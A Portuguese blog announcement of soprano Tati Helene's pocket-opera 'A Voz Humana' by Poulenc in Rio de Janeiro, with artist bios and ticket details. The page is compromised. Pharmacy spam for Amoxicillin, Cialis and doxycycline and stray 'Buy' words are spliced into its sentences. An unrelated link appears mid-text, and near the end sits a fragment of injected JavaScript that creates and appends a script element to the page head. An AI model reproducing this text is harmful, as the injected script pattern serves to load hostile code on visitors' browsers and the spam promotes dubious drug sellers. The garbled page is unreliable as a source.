ÓperaProgramaçãoRio de Janeiro

Pocket-ópera no Rio de Janeiro

Tati Helene canta A Voz Humana, de Poulenc, na Sala Cecília Meireles.

 

Após récitas em São Paulo, a soprano Tati Helene apresenta no Rio de Janeiro a pocket-ópera A Voz Humana, de Francis Poulenc (com libreto de Jean Cocteau). A récita ocorre no dia 2 de setembro, às 20h, na Sala Cecília Meireles, como parte da série Sala Brasil-França.

O espetáculo tem direção cênica de Roberto Alvim, direção musical de Emiliano Patarra e acompanhamento ao piano de Diego Lopes Salles buy Amoxicillin .

cialis with dapoxetine canadapharmacy Leia crítica da récita em São Paulo http://www.iceppi.it/?p=5750

 

Artistas Cheap Purchase

Tato Helene

Tati Helene já trabalhou com importantes nomes da cena lírica europeia, dentre os quais se destacam os diretores de cena Peter Konwitschny, com quem fez Salomé Buy em turnê pela Suíça, Bepi Morassi em produção do Teatro La Fenice em Veneza (onde deu vida à personagem Rosa na ópera Il Piccolo Spazzacamino, de Britten) e Stefano Vizioli, na produção paulistana de Falstaff feita pelo Theatro São Pedro. No Brasil, foi por duas vezes convidada para dividir o palco com destacados artistas do meio lírico no projeto Grandes Vozes, primeiro com o barítono Renato Bruson e depois com a mezzo-soprano Graciela Araya, sendo ambas as apresentações sucesso de público e de crítica.

O pianista Diego Lopes Salles é formado em Teoria e Percepção Musical pela Escola Municipal Livre de Música Edmundo Ramos Barbosa e pela Escola Municipal de Música de São Paulo. Estuda História da Música, harmonia e Piano e cursa Graduação na Universidade Estadual Júlio de Mesquita Filho (Unesp). Atua no âmbito Erudito e Popular como solista e correpetidor em ambas vertentes.

Espírito empreendedor e ousadia são traços que marcam a carreira de Emiliano Patarra. Nos últimos anos, o maestro esteve envolvido diretamente na criação da Orquestra Jovem Municipal de Guarulhos e da Orquestra do Theatro São Pedro e na estruturação das temporadas líricas desta casa de espetáculos, contribuindo para o crescimento qualitativo e quantitativo da atividade musical no país. Diretor artístico e fundador da Orquestra Jovem Municipal de Guarulhos, especializou-se em ópera e foi responsável pela montagem de uma grande quantidade de espetáculos líricos nos últimos anos.

 

Fotos: Gal Oppido

 
online

SERVIÇO:

 

Pocket-ópera “A Voz Humana”, de F. Poulenc

Tati Helene (soprano), Diego Lopes Salles (piano), Emiliano Patarra (direção musical) e Roberto Alvim (direção cênica)

 

doxycyclin buy 2 de setembro, sábado, às 20h

Sala Cecília Meireles Cialis Professional order (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos: R$ 40, com meia-entrada para estudantes e pessoas com mais de 60 anos

 var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); Buy

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.